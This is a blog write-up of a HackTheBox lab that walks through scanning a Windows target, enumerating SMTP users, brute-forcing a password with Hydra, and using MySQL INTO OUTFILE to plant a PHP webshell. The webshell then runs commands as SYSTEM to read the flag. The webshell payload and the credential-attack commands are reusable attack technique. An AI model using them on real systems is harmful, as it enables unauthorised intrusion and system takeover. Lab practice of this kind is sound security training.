Attacking Common Services-Easy

· j35se's blog

Table of Contents #

Scope of work #

Find the HTB Flag on the server manages emails, customers, and their files. The IP of the target system is 10.129.203.7.

Information Gathering #

I set the $IP variable to 10.129.203.7 in .zshrc and execute an NMAP scan. nmap -Pn -sS -sV -sC -p- $IP -oA easy.scan -v

21/tcp   open  ftp
25/tcp   open  smtp          hMailServer smtpd
80/tcp   open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29) |_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
443/tcp  open  ssl/https
587/tcp  open  smtp          hMailServer smtpd
3306/tcp open  mysql         MariaDB 5.5.5-10.4.24
3389/tcp open  ms-wbt-server Microsoft Terminal Services

http://10.129.203.7 took me to a generic webpage for XAMPP. https://10.129.203.7 prompted me for a username and password. I tried a few common combinations, but nothing worked.

Using the provided username list in resources, I was able to find a valid user.
smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t $IP

fiona@inlanefreight.htb

With a username, I used Hydra to see if I could find a usable password.
hydra -l fiona@inlanefreight.htb -P /usr/share/wordlists/rockyou.txt.gz smtp://$IP

Hydra returned a successful password for the username.
host: 10.129.203.7 login: fiona@inlanefreight.htb password: 987654321

fiona:987654321

With a usable username and password, I tried to access the https page. The credentials let me log in. In there are 2 files. The one with useful information is called webserver.txt

CoreFTP:
Directory C:\CoreFTP
Ports: 21 & 443
Test Command: curl -k -H "Host: localhost" --basic -u <username>:<password> https://localhost/docs.txt

Apache
Directory "C:\xampp\htdocs\"
Ports: 80 & 4443
Test Command: curl http://localhost/test.php

Not sure what to do with this information, I made an attempt to log in to MySQL.
mysql -u fiona -p987654321 -h $IP --ssl=FALSE

After looking through the databases and tables for anything useful, I need to look at the walkthrough. I was on the right track, but looking for the wrong things. I needed to look at the variables, specifically secure_file_priv. When this is blank, a logged-in user can upload a file anywhere. I used show variables where value = ''; and found out the value is blank.

Exploitation #

Again, using the walk-through, I entered SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:/xampp/htdocs/webshell.php'; to upload a webshell.

'c' is an arbitrary variable to store the command after it in the URL. Going back to the information in the webserver.txt, it tells me the directory I need to upload the file to is C:\xampp\htdocs.

Post Exploitation #

If the commands aren't workign in the URL, replace the spaces with %20. http://website/hello there will become http://website/hello%20there

With the shell uploaded, I opened Firefox to try a few commands. The first one I tried was http://10.129.203.7/webshell.php?c=whoami and see I'm nt authority\system

With system-level access, I started looking for the flag. To search for it, I used http://10.129.203.7/webshell.php?c=dir C:\Users /s /b | findstr flag.txt.

It returned the following:

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag.txt.lnk
C:\Users\Administrator\Desktop\flag.txt

With the location of flag.txt, I simply needed to read its contents. To do this, I typed http://10.129.203.7/webshell.php?c=type C:\Users\Administrator\Desktop\flag.txt and was able to capture the flag.

Mitigation Recommendations #

Lessons Learned #

#pentsting #hacking
last updated: